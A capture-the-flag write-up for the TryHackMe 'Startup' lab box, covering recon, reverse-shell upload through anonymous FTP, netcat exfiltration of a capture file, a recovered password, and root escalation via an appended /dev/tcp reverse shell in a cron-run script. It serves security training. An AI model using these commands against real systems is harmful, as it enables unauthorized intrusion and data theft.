Startup
Intro
Room Info
🔗 Name
🎯 Target IP
10.10.173.77
📈 Difficulty level
🟢Easy
💲 Subscription type
Free
🐧 OS
Linux
Recon
su
echo "10.10.173.77 startup.thm" >> /etc/hosts
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hostsStart Reconnaissance
mkdir thm/startup
cd thm/startup
nmap startup.thm
21/tcp open ftp
22/tcp open ssh
80/tcp open http
nmap -sV -sC -Pn -oA startup startup.thm21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.18.65.48
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9a60b841d2201a401304843612bab94 (RSA)
| 256 ec13258c182036e6ce910e1626eba2be (ECDSA)
|_ 256 a2ff2a7281aaa29f55a4dc9223e6b43f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelEnumerate Web server directories
gobuster dir -u http://startup.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt/files (Status: 301) [Size: 310] [--> http://startup.thm/files/]Navigate to
http://startup.thm/files/
Login via FTP with anonymous:anonymous. The files in the folder are the ones from the /files webpage.
ftp startup.thm
ls
Exploitation
Get a Reverse shell by uploading a PHP file via FTP and run it through the web page.
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php
# Set $ip & $port
$ip = '10.18.65.48';
$port = 1234;
mv php-reverse-shell.php shell.php# In the FTP anonymous session
cd ftp
put shell.phpnc -nvlp 1234Navigate to
http://startup.thm/files/ftp/shell.phpto get a reverse shell
/usr/bin/script -qc /bin/bash /dev/null
ls
cat recipe.txt
ls -lah /home
lennie
ls /incidents
suspicious.pcapng
cp /incidents/suspicious.pcapng /var/www/html/files/smb
# Permissions denied
Transfer suspicious.pcapng using netcat
# Kali
nc -nvlp 5555 > susp.pcap
# Startup box
nc -nv 10.18.65.48 5555 < /incidents/suspicious.pcapngAnalyze the susp.pcap file in Wireshark or use the strings command
strings susp.pcap
Try the string as password for lennie user.
su lennie
# password: c4ntg3t3n0ughsp1c3
# It works📌
lennie:c4ntg3t3n0ughsp1c3
🚩 Get
user.txt
find / -type f -iname user.txt 2>/dev/null
cat /home/lennie/user.txt
THM{0********************************Close the reverse shell and connect via SSH
Perform some Enumeration with lennie user
ls -lah *
-rw-r--r-- 1 lennie lennie 38 Nov 12 2020 user.txt
Documents:
total 20K
drwxr-xr-x 2 lennie lennie 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
-rw-r--r-- 1 root root 139 Nov 12 2020 concern.txt
-rw-r--r-- 1 root root 47 Nov 12 2020 list.txt
-rw-r--r-- 1 root root 101 Nov 12 2020 note.txt
scripts:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 May 15 13:38 startup_list.txt
cat scripts/*
cat Documents/*
cat /etc/print.sh
ls -lah /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
Privilege Escalation
Since planner.sh will be run as root (with a cron job), and it contains the /etc/print.sh command script, modify /etc/print.sh and input a payload (a reverse shell for example) into it to run it as root.
echo "/bin/bash -i >& /dev/tcp/10.18.65.48/3333 0>&1" >> /etc/print.shWait for the reverse shell on the attacker machine. The root will run the planner.sh script once a minute.
# Kali
nc -nvlp 3333
find / -type f -iname root.txt 2>/dev/null
cat /root/root.txt
THM{f********************************Last updated
Was this helpful?